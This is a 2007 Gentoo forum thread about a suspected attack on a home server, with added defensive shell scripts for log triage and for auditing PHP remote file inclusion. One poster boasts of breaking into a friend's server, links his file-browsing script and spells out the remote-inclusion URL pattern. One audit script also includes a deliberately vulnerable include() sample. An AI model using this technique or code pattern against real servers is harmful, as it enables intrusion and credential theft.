Gentoo Forums: Assistance » Networking & Security

hacker attack?

TimSSC
Apprentice
Posts: 170
Joined: Thu Apr 20, 2006 5:42 pm
Location: Cambridge, MA

Post by TimSSC » Sat Jul 07, 2007 4:15 am

Hello. Last night (around midnight), my home server (just a converted desktop machine) started making a lot of hard drive noise (not weird, hard-drive-failure noises, just regular, lots-of-activity noises); this went on for at least an hour and a half. During that time, I couldn't access my Apache server, or even access the internet from other machines, since it is all routed through the server. I immediately got worried about some kind of hacker attack and unplugged the WAN cable, but this still continued for quite a bit of time.

This morning, the machine was quiet, and I could access all the services except my Drupal site, and all the other services that use the MySQL database said there were too many connections. When I rebooted, I got this message:

    Strange, the socket file already exist in "/var/run/mysqld/mysqld.sock"
    it will be removed now and re-created by the MySQL server
    BUT please make your checks.

Anyhow, everything works fine now, but I'm just wondering if anyone knows what might have happened, and if I need to be worried about this. I'm not positive, but it sounded like the noise was coming from my system drive (all my website stuff is on a separate drive).

Well, just looking for advice. I appreciate any help.

Ma3oxuct
Guru
Posts: 523
Joined: Fri Apr 18, 2003 4:16 am

Post by Ma3oxuct » Sat Jul 07, 2007 5:54 am

Seems like a "denial of service" attack. The other possibility is that you had some process go off that started to eat a lot of your resources by using i/o. For example, I forgot that I configured a backup script, and was cursing the lights out because I could not use my comp.

Did you check your /var/log/messages? Maybe it will show you what happened.

In terms of "hacker attacks" (other than "denial of service") they are usually done very quietly.

yuwy
n00b
Posts: 38
Joined: Mon May 22, 2006 5:47 pm

Post by yuwy » Sat Jul 07, 2007 11:29 am

Well, I know that for fun sometimes people will nmap a server to see what open ports there are, and then use Metasploit, I suppose. Not sure if that may constitute the disk activity you speak of.

Shazam
Apprentice
Posts: 191
Joined: Tue Nov 23, 2004 3:44 pm
Location: Germany

Post by Shazam » Thu Aug 09, 2007 10:07 pm

Well. I hope your MySQL database password isn't the same as your root password.

A friend of mine had this 'problem', and now I have full access to his server.

Because of some flaw, I was able to execute a PHP script on his server and found a database password in another PHP file, which had the master password for the MySQL database in it, and the big mistake was, he used the same one as his root password...

Sad thing, he studies software engineering...

mudrii
l33t
Posts: 789
Joined: Thu Jun 26, 2003 12:27 am
Location: Singapore

Post by mudrii » Thu Aug 09, 2007 11:52 pm

What time did it start?
In Gentoo, at around 3 AM, in crontab you can find updatedb for locate. Check resources with top or htop, check the log and how many users are logged in with "w", and use rootkit hunter just in case.
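The checks Ma3oxuct and mudrii suggest above (the syslog around the window, what cron had scheduled, how many connections MySQL refused, then w, top and rkhunter on the live box) as an added shell example; it is not from any poster in this thread. The log and crontab excerpts are constructed samples, the function names are my own, and the backup job in the sample crontab is there only to show what a scheduled job landing at midnight looks like in the output.

```shell
#!/bin/sh
# Added triage helpers (not from the thread). The syslog and crontab
# excerpts at the bottom are constructed samples, not real output.

# Print syslog lines timestamped between START and END, each given as
# "Mon D HH:MM". Syslog carries no year, so month names are mapped to
# numbers and the window may cross midnight (but not New Year).
# Usage: log_window /var/log/messages "Jul 6 23:50" "Jul 7 01:30"
log_window() {
    awk -v s="$2" -v e="$3" '
    function key(mo, d, hm,   t) {
        split(hm, t, ":")
        return ((mon[mo] * 100 + d) * 100 + t[1]) * 100 + t[2]
    }
    BEGIN {
        n = split("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec", m, " ")
        for (i = 1; i <= n; i++) mon[m[i]] = i
        split(s, a, " "); ks = key(a[1], a[2], a[3])
        split(e, b, " "); ke = key(b[1], b[2], b[3])
    }
    NF >= 5 && ($1 in mon) {
        k = key($1, $2, $3)
        if (k >= ks && k <= ke) print
    }' "$1"
}

# Print crontab entries that can fire during hour H (0-23). Understands
# "*", an exact hour, comma lists and "*/N" steps in the hour field; skips
# comments and VAR=value lines. Works on /etc/crontab and user crontabs.
# Usage: cron_jobs_at_hour /etc/crontab 3
cron_jobs_at_hour() {
    awk -v h="$2" '
    function hour_matches(f,   n, i, p, step) {
        if (f == "*") return 1
        n = split(f, p, ",")
        for (i = 1; i <= n; i++) {
            if (p[i] ~ /^[0-9]+$/ && p[i] + 0 == h + 0) return 1
            if (p[i] ~ /^\*\/[0-9]+$/) {
                step = substr(p[i], 3)
                if (h % step == 0) return 1
            }
        }
        return 0
    }
    $1 !~ /^#/ && $1 !~ /=/ && NF >= 6 && hour_matches($2)' "$1"
}

# Count "Too many connections" refusals in a MySQL error log (or syslog).
# grep -c still prints 0 when nothing matches but exits 1, hence "|| true".
count_too_many_connections() {
    grep -c 'Too many connections' "$1" || true
}

# Live checks from mudrii's post, to run on the box itself (not run here).
live_checks() {
    w                          # who is logged in right now
    last -n 20                 # recent logins
    top -bn1 | head -n 20      # what is eating CPU and I/O now
    mysqladmin status          # current connection count
    rkhunter --check --sk      # rootkit hunter, without keypress prompts
}

# --- constructed sample data (not real output from the poster's server) ---
SAMPLE_LOG=$(mktemp); SAMPLE_CRON=$(mktemp)
trap 'rm -f "$SAMPLE_LOG" "$SAMPLE_CRON"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
Jul  6 22:10:03 home cron[2100]: (root) CMD (run-parts /etc/cron.hourly)
Jul  6 23:59:01 home cron[2311]: (root) CMD (/usr/local/bin/backup-www.sh)
Jul  7 00:05:44 home kernel: eth0: link down
Jul  7 01:12:09 home mysqld[1190]: Too many connections
Jul  7 03:00:01 home cron[2780]: (root) CMD (/usr/bin/updatedb)
Jul  7 09:31:55 home sshd[3001]: Accepted publickey for tim from 192.168.1.5 port 51022 ssh2
EOF
cat >"$SAMPLE_CRON" <<'EOF'
# constructed /etc/crontab excerpt
PATH=/sbin:/bin:/usr/sbin:/usr/bin
59 23  * * *  root  /usr/local/bin/backup-www.sh
0  3   * * *  root  /usr/bin/updatedb
0  */6 * * *  root  /usr/local/bin/rotate-logs.sh
EOF

# Report for the window the poster describes: "around midnight" on the
# night of Jul 6, lasting about an hour and a half.
report() {
    echo "== syslog, Jul 6 23:50 to Jul 7 01:30 =="
    log_window "$SAMPLE_LOG" "Jul 6 23:50" "Jul 7 01:30"
    echo "== cron jobs able to fire during the 23:xx and 00:xx hours =="
    cron_jobs_at_hour "$SAMPLE_CRON" 23
    cron_jobs_at_hour "$SAMPLE_CRON" 0
    echo "== MySQL refusals in the log: $(count_too_many_connections "$SAMPLE_LOG")"
}

if [ "${1:-}" = "--demo" ]; then report; fi
```

Run it with --demo to see the report against the samples; on a real box, point log_window at /var/log/messages (or the MySQL error log for the refusals) and cron_jobs_at_hour at /etc/crontab plus each user's crontab -l. A cron line at the start of the window usually ends the investigation; repeated disk activity with nothing in syslog and no job due is what justifies the rkhunter run and a look at who was logged in.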

GNUix
n00b
Posts: 35
Joined: Mon Aug 06, 2007 2:36 am
Location: South Korea

Post by GNUix » Fri Aug 10, 2007 1:48 am

OSSEC is your friend. It is very easy to install and get running. In my experience it works fantastically. Every time something has been "weird" with my machines in terms of security, OSSEC has picked it up and kindly emailed me about it, all the while dynamically modifying my firewall to block any attempted attacks.

Bones McCracker
Veteran
Posts: 1611
Joined: Tue Mar 14, 2006 8:23 am
Location: U.S.A.

Post by Bones McCracker » Fri Aug 10, 2007 6:25 am

Shazam wrote: A friend of mine had this 'problem', and now I have full access to his server.
Classic. So, are you sitting around trying to figure out how best to tea-bag him?

What are you like to your enemies? :D

Shazam
Apprentice
Posts: 191
Joined: Tue Nov 23, 2004 3:44 pm
Location: Germany

Post by Shazam » Fri Aug 10, 2007 7:18 am

Mm, so far no 'enemy' cracked. But I guess it depends on the hostility.
During my military service, I learned to counter means by the same means: if somebody beats you, you have no right to shoot him.


Well, TimSSC, what I actually wanted to tell you is: he might have gotten access to some webserver you've been running, or at least uploaded a PHP script to it or remotely executed one.

See, that is the script I used: http://www-users.rwth-aachen.de/gunther ... ageman.zip

With this script, you can browse through pretty much all folders on the server, as it only requires read access for the webserver, which means if you have stuff chmoded 664, you can read it.

I wrote this script as a(nother) friend of mine showed me a security issue which you get if you have a PHP script which includes others, and it isn't done right.

If you set some wrong variables in your php.ini (something with fopen_allow and from some URL) and have a script which is called like index.php?view=http://[url_to_bad_script]/pageman.txt, the attacker may be able to execute this script as if you had installed it on your webserver.

Well, and if this hacker is looking for some passwords on the server, he is probably looking through a couple of folders, and if he wants a complete file list of all the files you have got there, he probably causes some disk I/O. And on rather old hardware (I simply assume it), it could take a while.

I hope, by posting this, I'm not causing too much trouble around the globe, as you start trying this script on every server. It was originally intended to fix file permissions on my webspace, which you couldn't set via WebDAV, and later on, for backing up my database.
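A way to check your own server for the setup Shazam describes (a PHP include() whose argument comes from the query string, on a php.ini that lets include() fetch URLs), as an added shell example that is not Shazam's pageman script and not from the thread. The php.ini and PHP files are constructed samples; the vulnerable index.php sits beside an allowlisted version, and php_url_directives, remote_include_enabled, find_request_includes and rfi_audit are names I chose.

```shell
#!/bin/sh
# Added audit for the include()-of-a-URL problem described in the thread.
# Everything below the functions is constructed sample data in a temp dir.

# Print the php.ini directives that govern include() of a remote URL,
# normalised to name=value with comments (";") skipped.
php_url_directives() {
    awk '
    /^[ \t]*;/ { next }
    /^[ \t]*allow_url_(fopen|include)[ \t]*=/ { gsub(/[ \t]/, ""); print }
    ' "$1"
}

# Succeed (exit 0) if include() may load http:// paths. allow_url_include
# exists since PHP 5.2 and decides when present; when it is absent this
# falls back to allow_url_fopen, which on older PHP controlled both, and
# assumes PHP's compiled default (On) if that is absent too.
remote_include_enabled() {
    php_url_directives "$1" | awk -F= '
    BEGIN { fopen = 1; seen = 0; on = 0 }
    tolower($1) == "allow_url_include" { seen = 1; on = ($2 ~ /^(1|[Oo]n|[Tt]rue)$/) }
    tolower($1) == "allow_url_fopen"   { fopen = ($2 ~ /^(1|[Oo]n|[Tt]rue)$/) }
    END { exit !(seen ? on : fopen) }'
}

# List include/require statements whose path is built from request data.
# Catches include($_GET["view"]) as well as include("pages/" . $_GET["view"]).
find_request_includes() {
    grep -rnE '(include|require)(_once)?[^;]*\$_(GET|POST|REQUEST|COOKIE)' "$1" || true
}

# Print the evidence; fail (exit 1) only when both halves of the problem
# are present: remote includes enabled AND a request-controlled include.
rfi_audit() {
    ini_on=0; hits=$(find_request_includes "$2")
    if remote_include_enabled "$1"; then
        echo "php.ini: include() may fetch http:// paths (set allow_url_include = Off)"
        ini_on=1
    fi
    if [ -n "$hits" ]; then
        echo "request-controlled include(s), a local file inclusion even with remote includes off:"
        echo "$hits"
    fi
    if [ "$ini_on" -eq 1 ] && [ -n "$hits" ]; then return 1; fi
    return 0
}

# --- constructed samples (not the poster's configuration or code) ---
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
INI="$WORK/php.ini"; INI_FIXED="$WORK/php-fixed.ini"
mkdir -p "$WORK/vuln" "$WORK/fixed"
cat >"$INI" <<'EOF'
; constructed php.ini excerpt: the weak setting
allow_url_fopen = On
allow_url_include = On
EOF
cat >"$INI_FIXED" <<'EOF'
; constructed php.ini excerpt: corrected
allow_url_fopen = On
allow_url_include = Off
EOF
cat >"$WORK/vuln/index.php" <<'EOF'
<?php
// constructed: index.php?view=http://[url_to_bad_script]/pageman.txt runs that script here
include($_GET['view']);
EOF
cat >"$WORK/fixed/index.php" <<'EOF'
<?php
// constructed hardened form: the parameter selects from a fixed map, never a path
$pages = array('home' => 'pages/home.php', 'news' => 'pages/news.php');
$view = isset($_GET['view']) ? $_GET['view'] : 'home';
if (!isset($pages[$view])) { $view = 'home'; }
include $pages[$view];
EOF

if [ "${1:-}" = "--demo" ]; then
    rfi_audit "$INI" "$WORK/vuln" || echo "RISKY: $INI + $WORK/vuln"
    rfi_audit "$INI_FIXED" "$WORK/fixed" && echo "OK: $INI_FIXED + $WORK/fixed"
fi
```

Turning allow_url_include off stops the index.php?view=http://... trick, but include($_GET['view']) is still a local file inclusion (any file the webserver user can read, which is the 664 point made above), so the code fix matters regardless of php.ini; that is why the audit prints the includes even when the ini is clean. allow_url_fopen stays On in the corrected sample because many applications rely on it for fopen() and file_get_contents(); on PHP older than 5.2 there is no separate allow_url_include and that one directive controls both, which is why the check falls back to it. On a real box, run php_url_directives against the php.ini that `php --ini` reports and find_request_includes against the document root.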